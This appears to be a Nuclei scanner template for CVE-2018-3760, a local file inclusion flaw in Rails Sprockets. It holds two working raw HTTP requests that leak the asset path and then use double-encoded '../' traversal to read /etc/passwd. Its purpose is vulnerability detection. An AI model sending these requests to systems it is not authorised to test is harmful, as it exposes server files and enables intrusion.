Description
Ruby On Rails is vulnerable to local file inclusion caused by secondary decoding in Sprockets 3.7.1 and lower versions. An attacker can use %252e%252e/ to access the root directory and read or execute any file on the target server.
Ruby On Rails is vulnerable to local file inclusion caused by secondary decoding in Sprockets 3.7.1 and lower versions. An attacker can use %252e%252e/ to access the root directory and read or execute any file on the target server.
id: CVE-2018-3760
info:
name: Ruby On Rails - Local File Inclusion
author: 0xrudra,pikpikcu,diedromeo
severity: high
description: |
Ruby On Rails is vulnerable to local file inclusion caused by secondary decoding in Sprockets 3.7.1 and lower versions. An attacker can use %252e%252e/ to access the root directory and read or execute any file on the target server.
impact: |
This vulnerability can lead to unauthorized access to sensitive files and information stored on the server.
remediation: |
Apply the latest security patches and updates for Ruby On Rails framework to fix the Local File Inclusion vulnerability.
reference:
- https://github.com/vulhub/vulhub/tree/master/rails/CVE-2018-3760
- https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf
- https://seclists.org/oss-sec/2018/q2/210
- https://xz.aliyun.com/t/2542
- https://nvd.nist.gov/vuln/detail/CVE-2018-3760
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2018-3760
cwe-id: CWE-200,CWE-22
epss-score: 0.26717
epss-percentile: 0.9792
cpe: cpe:2.3:a:redhat:cloudforms:4.5:*:*:*:*:*:*:*
metadata:
max-request: 2
vendor: redhat
product: cloudforms
tags: cve2018,cve,rails,lfi,ruby,vulhub,seclists,redhat,vkev,vuln
flow: |
http("leak") && http("exploit")
http:
- id: leak
raw:
- |
GET /assets/file:%2f%2f/etc/passwd HTTP/1.1
Host: {{Hostname}}
disable-path-automerge: true
matchers:
- type: word
words:
- "is no longer under a load path"
extractors:
- type: regex
name: path
group: 1
regex:
- "/etc/passwd is no longer under a load path: (.*?),"
internal: true
part: body
- id: exploit
raw:
- |
GET /assets/file:%2f%2f{{path}}/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd HTTP/1.1
Host: {{Hostname}}
disable-path-automerge: true
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# digest: 4b0a0048304602210099e308e8b2d039a3e58b81bd4803ac8c7af361ad44d5b1c9fd0f99517a11dc56022100d47aa00bb859142c705b4b471e29ba3787762251c38aa900bd1d83e5d7e21ac9:922c64590222798bb761d5b6d8e72950
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.